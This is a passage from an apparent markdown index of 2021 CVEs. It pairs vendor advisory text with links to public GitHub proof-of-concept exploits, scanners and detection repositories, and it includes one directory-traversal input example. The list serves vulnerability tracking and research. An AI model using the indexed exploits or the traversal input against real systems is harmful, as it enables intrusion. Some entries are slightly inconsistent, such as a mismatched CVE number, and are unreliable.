CVE-2021-21220 (2021-04-26) + +Insufficient validation of untrusted input in V8 in Google Chrome prior to 89.0.4389.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [security-dbg/CVE-2021-21220](https://github.com/security-dbg/CVE-2021-21220) + +### CVE-2021-21234 (2021-01-05) + +spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability. The nature of this library is to expose a log file directory via admin (spring boot actuator) HTTP endpoints. Both the filename to view and a base folder (relative to the logging folder root) can be specified via request parameters. While the filename parameter was checked to prevent directory traversal exploits (so that `filename=../somefile` would not work), the base folder parameter was not sufficiently checked, so that `filename=somefile&base=../` could access a file outside the logging base directory). The vulnerability has been patched in release 0.2.13. Any users of 0.2.12 should be able to update without any issues as there are no other changes in that release. There is no workaround to fix the vulnerability other than updating or removing the dependency. However, removing read access of the user the application is run with to any directory not required for running the application can limit the impact. Additionally, access to the logview endpoint can be limited by deploying the application behind a reverse proxy. + + +- [PwCNO-CTO/CVE-2021-21234](https://github.com/PwCNO-CTO/CVE-2021-21234) +- [xiaojiangxl/CVE-2021-21234](https://github.com/xiaojiangxl/CVE-2021-21234) + +### CVE-2021-21239 (2021-01-21) + +PySAML2 is a pure python implementation of SAML Version 2 Standard. PySAML2 before 6.5.0 has an improper verification of cryptographic signature vulnerability. Users of pysaml2 that use the default CryptoBackendXmlSec1 backend and need to verify signed SAML documents are impacted. PySAML2 does not ensure that a signed SAML document is correctly signed. The default CryptoBackendXmlSec1 backend is using the xmlsec1 binary to verify the signature of signed SAML documents, but by default xmlsec1 accepts any type of key found within the given document. xmlsec1 needs to be configured explicitly to only use only _x509 certificates_ for the verification process of the SAML document signature. This is fixed in PySAML2 6.5.0. + + +- [RyanBoomer30/CVE-2021-21239-Exploit](https://github.com/RyanBoomer30/CVE-2021-21239-Exploit) + +### CVE-2021-21300 (2021-03-09) + +Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are: 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. + + +- [AlkenePan/CVE-2021-21300](https://github.com/AlkenePan/CVE-2021-21300) +- [Faisal78123/CVE-2021-21300](https://github.com/Faisal78123/CVE-2021-21300) +- [erranfenech/CVE-2021-21300](https://github.com/erranfenech/CVE-2021-21300) +- [Maskhe/CVE-2021-21300](https://github.com/Maskhe/CVE-2021-21300) +- [1uanWu/CVE-2021-21300](https://github.com/1uanWu/CVE-2021-21300) +- [Kirill89/CVE-2021-21300](https://github.com/Kirill89/CVE-2021-21300) +- [ETOCheney/cve-2021-21300](https://github.com/ETOCheney/cve-2021-21300) +- [fengzhouc/CVE-2021-21300](https://github.com/fengzhouc/CVE-2021-21300) +- [danshuizhangyu/CVE-2021-21300](https://github.com/danshuizhangyu/CVE-2021-21300) +- [0ahu/CVE-2021-21300](https://github.com/0ahu/CVE-2021-21300) +- [macilin/CVE-2021-21300](https://github.com/macilin/CVE-2021-21300) +- [Roboterh/CVE-2021-21300](https://github.com/Roboterh/CVE-2021-21300) +- [henry861010/Network_Security_NYCU](https://github.com/henry861010/Network_Security_NYCU) +- [Saboor-Hakimi-23/CVE-2021-21300](https://github.com/Saboor-Hakimi-23/CVE-2021-21300) + +### CVE-2021-21311 (2021-02-11) + +Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9. + + +- [llhala/CVE-2021-21311](https://github.com/llhala/CVE-2021-21311) +- [omoknooni/CVE-2021-21311](https://github.com/omoknooni/CVE-2021-21311) + +### CVE-2021-21315 (2021-02-16) + +The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected. + + +- [ForbiddenProgrammer/CVE-2021-21315-PoC](https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC) +- [cherrera0001/CVE-2021-21315v2](https://github.com/cherrera0001/CVE-2021-21315v2) +- [MazX0p/CVE-2021-21315-exploit](https://github.com/MazX0p/CVE-2021-21315-exploit) +- [alikarimi999/CVE-2021-21315](https://github.com/alikarimi999/CVE-2021-21315) +- [G01d3nW01f/CVE-2021-21315](https://github.com/G01d3nW01f/CVE-2021-21315) +- [xMohamed0/CVE-2021-21315-POC](https://github.com/xMohamed0/CVE-2021-21315-POC) + +### CVE-2021-21341 (2021-03-22) + +XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is vulnerability which may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16. + + +- [s-index/CVE-2021-21341](https://github.com/s-index/CVE-2021-21341) +- [Mani1325/ka-cve-2021-21341](https://github.com/Mani1325/ka-cve-2021-21341) + +### CVE-2021-21349 (2021-03-22) + +XStream is a Java library to serialize objects to XML and back again. In XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. If you rely on XStream's default blacklist of the Security Framework, you will have to use at least version 1.4.16. + + +- [s-index/CVE-2021-21349](https://github.com/s-index/CVE-2021-21349) + +### CVE-2021-21380 (2021-03-23) + +XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions of XWiki Platform (and only those with the Ratings API installed), the Rating Script Service expose an API to perform SQL requests without escaping the from and where search arguments. This might lead to an SQL script injection quite easily for any user having Script rights on XWiki. The problem has been patched in XWiki 12.9RC1. The only workaround besides upgrading XWiki would be to uninstall the Ratings API in XWiki from the Extension Manager. + + +- [rvermeulen/codeql-workshop-cve-2021-21380](https://github.com/rvermeulen/codeql-workshop-cve-2021-21380) + +### CVE-2021-21389 (2021-03-26) + +BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue. + + +- [HoangKien1020/CVE-2021-21389](https://github.com/HoangKien1020/CVE-2021-21389) + +### CVE-2021-21401 (2021-03-23) + +Nanopb is a small code-size Protocol Buffers implementation in ansi C. In Nanopb before versions 0.3.9.8 and 0.4.5, decoding a specifically formed message can cause invalid `free()` or `realloc()` calls if the message type contains an `oneof` field, and the `oneof` directly contains both a pointer field and a non-pointer field. If the message data first contains the non-pointer field and then the pointer field, the data of the non-pointer field is incorrectly treated as if it was a pointer value. Such message data rarely occurs in normal messages, but it is a concern when untrusted data is parsed. This has been fixed in versions 0.3.9.8 and 0.4.5. See referenced GitHub Security Advisory for more information including workarounds. + + +- [uthrasri/CVE-2021-21401_nanopb-c_AOSP10_R33](https://github.com/uthrasri/CVE-2021-21401_nanopb-c_AOSP10_R33) +- [HimanshuS67/external_nanopb-c_AOSP10_CVE-2021-21401](https://github.com/HimanshuS67/external_nanopb-c_AOSP10_CVE-2021-21401) + +### CVE-2021-21402 (2021-03-23) + +Jellyfin is a Free Software Media System. In Jellyfin before version 10.7.1, with certain endpoints, well crafted requests will allow arbitrary file read from a Jellyfin server's file system. This issue is more prevalent when Windows is used as the host OS. Servers that are exposed to the public Internet are potentially at risk. This is fixed in version 10.7.1. As a workaround, users may be able to restrict some access by enforcing strict security permissions on their filesystem, however, it is recommended to update as soon as possible. + + +- [jiaocoll/CVE-2021-21402-Jellyfin](https://github.com/jiaocoll/CVE-2021-21402-Jellyfin) +- [somatrasss/CVE-2021-21402](https://github.com/somatrasss/CVE-2021-21402) +- [givemefivw/CVE-2021-21402](https://github.com/givemefivw/CVE-2021-21402) + +### CVE-2021-21425 (2021-04-07) + +Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages. In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes, such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command under the context of the web-server user. This vulnerability is fixed in version 1.10.8. Blocking access to the `/admin` path from untrusted sources can be applied as a workaround. + + +- [CsEnox/CVE-2021-21425](https://github.com/CsEnox/CVE-2021-21425) +- [frknktlca/GravCMS_Nmap_Script](https://github.com/frknktlca/GravCMS_Nmap_Script) +- [bluetoothStrawberry/cve-2021-21425](https://github.com/bluetoothStrawberry/cve-2021-21425) + +### CVE-2021-21514 (2021-03-02) + +Dell EMC OpenManage Server Administrator (OMSA) versions 9.5 and prior contain a path traversal vulnerability. A remote user with admin privileges could potentially exploit this vulnerability to view arbitrary files on the target system by sending a specially crafted URL request. + + +- [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA) + +### CVE-2021-21551 (2021-05-04) + +Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required. + + +- [waldo-irc/CVE-2021-21551](https://github.com/waldo-irc/CVE-2021-21551) +- [ch3rn0byl/CVE-2021-21551](https://github.com/ch3rn0byl/CVE-2021-21551) +- [arnaudluti/PS-CVE-2021-21551](https://github.com/arnaudluti/PS-CVE-2021-21551) +- [mathisvickie/CVE-2021-21551](https://github.com/mathisvickie/CVE-2021-21551) +- [mzakocs/CVE-2021-21551-POC](https://github.com/mzakocs/CVE-2021-21551-POC) +- [ihack4falafel/Dell-Driver-EoP-CVE-2021-21551](https://github.com/ihack4falafel/Dell-Driver-EoP-CVE-2021-21551) +- [tijme/kernel-mii](https://github.com/tijme/kernel-mii) +- [nanabingies/CVE-2021-21551](https://github.com/nanabingies/CVE-2021-21551) +- [Eap2468/CVE-2021-21551](https://github.com/Eap2468/CVE-2021-21551) + +### CVE-2021-21716 +- [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py) + +### CVE-2021-21809 (2021-06-23) + +A command execution vulnerability exists in the default legacy spellchecker plugin in Moodle 3.10. A specially crafted series of HTTP requests can lead to command execution. An attacker must have administrator privileges to exploit this vulnerabilities. + + +- [anldori/CVE-2021-21809](https://github.com/anldori/CVE-2021-21809) + +### CVE-2021-21972 (2021-02-24) + +The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + + +- [psc4re/NSE-scripts](https://github.com/psc4re/NSE-scripts) +- [QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC](https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC) +- [NS-Sp4ce/CVE-2021-21972](https://github.com/NS-Sp4ce/CVE-2021-21972) +- [yaunsky/CVE-2021-21972](https://github.com/yaunsky/CVE-2021-21972) +- [horizon3ai/CVE-2021-21972](https://github.com/horizon3ai/CVE-2021-21972) +- [Osyanina/westone-CVE-2021-21972-scanner](https://github.com/Osyanina/westone-CVE-2021-21972-scanner) +- [alt3kx/CVE-2021-21972](https://github.com/alt3kx/CVE-2021-21972) +- [milo2012/CVE-2021-21972](https://github.com/milo2012/CVE-2021-21972) +- [conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972](https://github.com/conjojo/VMware_vCenter_UNAuthorized_RCE_CVE-2021-21972) +- [L-pin/CVE-2021-21972](https://github.com/L-pin/CVE-2021-21972) +- [B1anda0/CVE-2021-21972](https://github.com/B1anda0/CVE-2021-21972) +- [renini/CVE-2021-21972](https://github.com/renini/CVE-2021-21972) +- [GuayoyoCyber/CVE-2021-21972](https://github.com/GuayoyoCyber/CVE-2021-21972) +- [JMousqueton/Detect-CVE-2021-21972](https://github.com/JMousqueton/Detect-CVE-2021-21972) +- [robwillisinfo/VMware_vCenter_CVE-2021-21972](https://github.com/robwillisinfo/VMware_vCenter_CVE-2021-21972) +- [Ma1Dong/vcenter_rce](https://github.com/Ma1Dong/vcenter_rce) +- [d3sh1n/cve-2021-21972](https://github.com/d3sh1n/cve-2021-21972) +- [ByZain/CVE-2021-21972](https://github.com/ByZain/CVE-2021-21972) +- [TaroballzChen/CVE-2021-21972](https://github.com/TaroballzChen/CVE-2021-21972) +- [ZTK-009/CVE-2021-21972](https://github.com/ZTK-009/CVE-2021-21972) +- [murataydemir/CVE-2021-21972](https://github.com/murataydemir/CVE-2021-21972) +- [pettyhacks/vSphereyeeter](https://github.com/pettyhacks/vSphereyeeter) +- [haidv35/CVE-2021-21972](https://github.com/haidv35/CVE-2021-21972) +- [TAI-REx/CVE-2021-21972](https://github.com/TAI-REx/CVE-2021-21972) +- [orangmuda/CVE-2021-21972](https://github.com/orangmuda/CVE-2021-21972) +- [user16-et/cve-2021-21972_PoC](https://github.com/user16-et/cve-2021-21972_PoC) +- [Schira4396/VcenterKiller](https://github.com/Schira4396/VcenterKiller) + +### CVE-2021-21973 (2021-02-24) + +The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + + +- [freakanonymous/CVE-2021-21973-Automateme](https://github.com/freakanonymous/CVE-2021-21973-Automateme) + +### CVE-2021-21974 (2021-02-24) + +OpenSLP as used in ESXi (7.0 before ESXi70U1c-17325551, 6.7 before ESXi670-202102401-SG, 6.5 before ESXi650-202102101-SG) has a heap-overflow vulnerability. A malicious actor residing within the same network segment as ESXi who has access to port 427 may be able to trigger the heap-overflow issue in OpenSLP service resulting in remote code execution. + + +- [Shadow0ps/CVE-2021-21974](https://github.com/Shadow0ps/CVE-2021-21974) +- [n2x4/Feb2023-CVE-2021-21974-OSINT](https://github.com/n2x4/Feb2023-CVE-2021-21974-OSINT) +- [CYBERTHREATANALYSIS/ESXi-Ransomware-Scanner-mi](https://github.com/CYBERTHREATANALYSIS/ESXi-Ransomware-Scanner-mi) +- [hateme021202/cve-2021-21974](https://github.com/hateme021202/cve-2021-21974) + +### CVE-2021-21975 (2021-03-31) + +Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. + + +- [Henry4E36/VMWare-vRealize-SSRF](https://github.com/Henry4E36/VMWare-vRealize-SSRF) +- [dorkerdevil/CVE-2021-21975](https://github.com/dorkerdevil/CVE-2021-21975) +- [Al1ex/CVE-2021-21975](https://github.com/Al1ex/CVE-2021-21975) +- [TheTh1nk3r/exp_hub](https://github.com/TheTh1nk3r/exp_hub) +- [GuayoyoCyber/CVE-2021-21975](https://github.com/GuayoyoCyber/CVE-2021-21975) +- [murataydemir/CVE-2021-21975](https://github.com/murataydemir/CVE-2021-21975) +- [rabidwh0re/REALITY_SMASHER](https://github.com/rabidwh0re/REALITY_SMASHER) +- [Vulnmachines/VMWare-CVE-2021-21975](https://github.com/Vulnmachines/VMWare-CVE-2021-21975) + +### CVE-2021-21978 (2021-03-03) + +VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. + + +- [GreyOrder/CVE-2021-21978](https://github.com/GreyOrder/CVE-2021-21978) +- [me1ons/CVE-2021-21978](https://github.com/me1ons/CVE-2021-21978) +- [skytina/CVE-2021-21978](https://github.com/skytina/CVE-2021-21978) + +### CVE-2021-21980 (2021-11-24) + +The vSphere Web Client (FLEX/Flash) contains an unauthorized arbitrary file read vulnerability. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information. + + +- [Osyanina/westone-CVE-2021-21980-scanner](https://github.com/Osyanina/westone-CVE-2021-21980-scanner) +- [Osyanina/westone-CVE-2022-1388-scanner](https://github.com/Osyanina/westone-CVE-2022-1388-scanner) + +### CVE-2021-21983 (2021-03-31) + +Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system. + + +- [murataydemir/CVE-2021-21983](https://github.com/murataydemir/CVE-2021-21983) + +### CVE-2021-21985 (2021-05-26) + +The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. + + +- [bigbroke/CVE-2021-21985](https://github.com/bigbroke/CVE-2021-21985) +- [alt3kx/CVE-2021-21985_PoC](https://github.com/alt3kx/CVE-2021-21985_PoC) +- [onSec-fr/CVE-2021-21985-Checker](https://github.com/onSec-fr/CVE-2021-21985-Checker) +- [mauricelambert/CVE-2021-21985](https://github.com/mauricelambert/CVE-2021-21985) +- [xnianq/cve-2021-21985_exp](https://github.com/xnianq/cve-2021-21985_exp) +- [daedalus/CVE-2021-21985](https://github.com/daedalus/CVE-2021-21985) +- [testanull/Project_CVE-2021-21985_PoC](https://github.com/testanull/Project_CVE-2021-21985_PoC) +- [haidv35/CVE-2021-21985](https://github.com/haidv35/CVE-2021-21985) +- [aristosMiliaressis/CVE-2021-21985](https://github.com/aristosMiliaressis/CVE-2021-21985) +- [sknux/CVE-2021-21985_PoC](https://github.com/sknux/CVE-2021-21985_PoC) + +### CVE-2021-22005 (2021-09-23) + +The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. + + +- [1ZRR4H/CVE-2021-22005](https://github.com/1ZRR4H/CVE-2021-22005) +- [pisut4152/Sigma-Rule-for-CVE-2021-22005-scanning-activity](https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-22005-scanning-activity) +- [Jeromeyoung/VMWare-CVE-Check](https://github.com/Jeromeyoung/VMWare-CVE-Check) +- [5gstudent/CVE-2021-22005-](https://github.com/5gstudent/CVE-2021-22005-) +- [RedTeamExp/CVE-2021-22005_PoC](https://github.com/RedTeamExp/CVE-2021-22005_PoC) +- [rwincey/CVE-2021-22005](https://github.com/rwincey/CVE-2021-22005) +- [TaroballzChen/CVE-2021-22005-metasploit](https://github.com/TaroballzChen/CVE-2021-22005-metasploit) +- [tiagob0b/CVE-2021-22005](https://github.com/tiagob0b/CVE-2021-22005) +- [Jun-5heng/CVE-2021-22005](https://github.com/Jun-5heng/CVE-2021-22005) +- [shmilylty/cve-2021-22005-exp](https://github.com/shmilylty/cve-2021-22005-exp) +- [InventorMAO/cve-2021-22005](https://github.com/InventorMAO/cve-2021-22005) + +### CVE-2021-22006 (2021-09-23) + +The vCenter Server contains a reverse proxy bypass vulnerability due to the way the endpoints handle the URI. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to access restricted endpoints. + + +- [CrackerCat/CVE-2021-22006](https://github.com/CrackerCat/CVE-2021-22006) + +### CVE-2021-22015 (2021-09-23) + +The vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. An authenticated local user with non-administrative privilege may exploit these issues to elevate their privileges to root on vCenter Server Appliance. + + +- [PenteraIO/vScalation-CVE-2021-22015](https://github.com/PenteraIO/vScalation-CVE-2021-22015) + +### CVE-2021-22053 (2021-11-19) + +Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution. + + +- [SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053](https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053) +- [Vulnmachines/CVE-2021-22053](https://github.com/Vulnmachines/CVE-2021-22053) + +### CVE-2021-22054 (2021-12-17) + +VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + + +- [MKSx/CVE-2021-22054](https://github.com/MKSx/CVE-2021-22054) + +### CVE-2021-22119 (2021-06-29) + +Spring Security versions 5.5.x prior to 5.5.1, 5.4.x prior to 5.4.7, 5.3.x prior to 5.3.10 and 5.2.x prior to 5.2.11 are susceptible to a Denial-of-Service (DoS) attack via the initiation of the Authorization Request in an OAuth 2.0 Client Web and WebFlux application. A malicious user or attacker can send multiple requests initiating the Authorization Request for the Authorization Code Grant, which has the potential of exhausting system resources using a single session or multiple sessions. + + +- [mari6274/oauth-client-exploit](https://github.com/mari6274/oauth-client-exploit) + +### CVE-2021-22123 (2021-06-01) + +An OS command injection vulnerability in FortiWeb's management interface 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page. + + +- [murataydemir/CVE-2021-22123](https://github.com/murataydemir/CVE-2021-22123) + +### CVE-2021-22145 (2021-07-21) + +A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details. + + +- [niceeeeeeee/CVE-2021-22145-poc](https://github.com/niceeeeeeee/CVE-2021-22145-poc) + +### CVE-2021-22146 (2021-07-21) + +All versions of Elastic Cloud Enterprise has the Elasticsearch “anonymous” user enabled by default in deployed clusters. While in the default setting the anonymous user has no permissions and is unable to successfully query any Elasticsearch APIs, an attacker could leverage the anonymous user to gain insight into certain details of a deployed cluster. + + +- [magichk/cve-2021-22146](https://github.com/magichk/cve-2021-22146) + +### CVE-2021-22192 (2021-03-24) + +An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.2 allowing unauthorized authenticated users to execute arbitrary code on the server. + + +- [EXP-Docs/CVE-2021-22192](https://github.com/EXP-Docs/CVE-2021-22192) +- [PetrusViet/Gitlab-RCE](https://github.com/PetrusViet/Gitlab-RCE) + +### CVE-2021-22201 (2021-04-02) + +An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.9. A specially crafted import file could read files on the server. + + +- [exp1orer/CVE-2021-22201](https://github.com/exp1orer/CVE-2021-22201) + +### CVE-2021-22204 (2021-04-23) + +Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image + + +- [convisolabs/CVE-2021-22204-exiftool](https://github.com/convisolabs/CVE-2021-22204-exiftool) +- [se162xg/CVE-2021-22204](https://github.com/se162xg/CVE-2021-22204) +- [bilkoh/POC-CVE-2021-22204](https://github.com/bilkoh/POC-CVE-2021-22204) +- [PenTestical/CVE-2021-22204](https://github.com/PenTestical/CVE-2021-22204) +- [AssassinUKG/CVE-2021-22204](https://github.com/AssassinUKG/CVE-2021-22204) +- [ph-arm/CVE-2021-22204-Gitlab](https://github.com/ph-arm/CVE-2021-22204-Gitlab) +- [Asaad27/CVE-2021-22204-RSE](https://github.com/Asaad27/CVE-2021-22204-RSE) +- [trganda/CVE-2021-22204](https://github.com/trganda/CVE-2021-22204) +- [0xBruno/CVE-2021-22204](https://github.com/0xBruno/CVE-2021-22204) +- [mr-tuhin/CVE-2021-22204-exiftool](https://github.com/mr-tuhin/CVE-2021-22204-exiftool) +- [UNICORDev/exploit-CVE-2021-22204](https://github.com/UNICORDev/exploit-CVE-2021-22204) +- [Akash7350/CVE-2021-22204](https://github.com/Akash7350/CVE-2021-22204) +- [battleofthebots/dejavu](https://github.com/battleofthebots/dejavu) +- [cc3305/CVE-2021-22204](https://github.com/cc3305/CVE-2021-22204) + +### CVE-2021-22205 (2021-04-23) + +An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. + + +- [mr-r3bot/Gitlab-CVE-2021-22205](https://github.com/mr-r3bot/Gitlab-CVE-2021-22205) +- [XTeam-Wing/CVE-2021-22205](https://github.com/XTeam-Wing/CVE-2021-22205) +- [r0eXpeR/CVE-2021-22205](https://github.com/r0eXpeR/CVE-2021-22205) +- [ZZ-SOCMAP/CVE-2021-22205](https://github.com/ZZ-SOCMAP/CVE-2021-22205) +- [Al1ex/CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205) +- [whwlsfb/CVE-2021-22205](https://github.com/whwlsfb/CVE-2021-22205) +- [findneo/GitLab-preauth-RCE_CVE-2021-22205](https://github.com/findneo/GitLab-preauth-RCE_CVE-2021-22205) +- [Seals6/CVE-2021-22205](https://github.com/Seals6/CVE-2021-22205) +- [c0okB/CVE-2021-22205](https://github.com/c0okB/CVE-2021-22205) +- [shang159/CVE-2021-22205-getshell](https://github.com/shang159/CVE-2021-22205-getshell) +- [devdanqtuan/CVE-2021-22205](https://github.com/devdanqtuan/CVE-2021-22205) +- [hh-hunter/cve-2021-22205](https://github.com/hh-hunter/cve-2021-22205) +- [runsel/GitLab-CVE-2021-22205-](https://github.com/runsel/GitLab-CVE-2021-22205-) +- [faisalfs10x/GitLab-CVE-2021-22205-scanner](https://github.com/faisalfs10x/GitLab-CVE-2021-22205-scanner) +- [inspiringz/CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205) +- [pizza-power/Golang-CVE-2021-22205-POC](https://github.com/pizza-power/Golang-CVE-2021-22205-POC) +- [DIVD-NL/GitLab-cve-2021-22205-nse](https://github.com/DIVD-NL/GitLab-cve-2021-22205-nse) +- [w0x68y/Gitlab-CVE-2021-22205](https://github.com/w0x68y/Gitlab-CVE-2021-22205) +- [al4xs/CVE-2021-22205-gitlab](https://github.com/al4xs/CVE-2021-22205-gitlab) +- [honypot/CVE-2021-22205](https://github.com/honypot/CVE-2021-22205) +- [momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-](https://github.com/momika233/cve-2021-22205-GitLab-13.10.2---Remote-Code-Execution-RCE-Unauthenticated-) +- [keven1z/CVE-2021-22205](https://github.com/keven1z/CVE-2021-22205) +- [hhhotdrink/CVE-2021-22205](https://github.com/hhhotdrink/CVE-2021-22205) +- [sei-fish/CVE-2021-22205](https://github.com/sei-fish/CVE-2021-22205) +- [overgrowncarrot1/DejaVu-CVE-2021-22205](https://github.com/overgrowncarrot1/DejaVu-CVE-2021-22205) +- [Hikikan/CVE-2021-22205](https://github.com/Hikikan/CVE-2021-22205) +- [NukingDragons/gitlab-cve-2021-22205](https://github.com/NukingDragons/gitlab-cve-2021-22205) +- [cc3305/CVE-2021-22205](https://github.com/cc3305/CVE-2021-22205) + +### CVE-2021-22206 (2021-05-06) + +An issue has been discovered in GitLab affecting all versions starting from 11.6. Pull mirror credentials are exposed that allows other maintainers to be able to view the credentials in plain-text, + + +- [dannymas/CVE-2021-22206](https://github.com/dannymas/CVE-2021-22206) + +### CVE-2021-22214 (2021-06-08) + +When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited + + +- [aaminin/CVE-2021-22214](https://github.com/aaminin/CVE-2021-22214) +- [Vulnmachines/gitlab-cve-2021-22214](https://github.com/Vulnmachines/gitlab-cve-2021-22214) +- [ZZ-SOCMAP/CVE-2021-22214](https://github.com/ZZ-SOCMAP/CVE-2021-22214) + +### CVE-2021-22555 (2021-07-07) + +A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c. This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space + + +- [JoneyJunior/cve-2021-22555](https://github.com/JoneyJunior/cve-2021-22555) +- 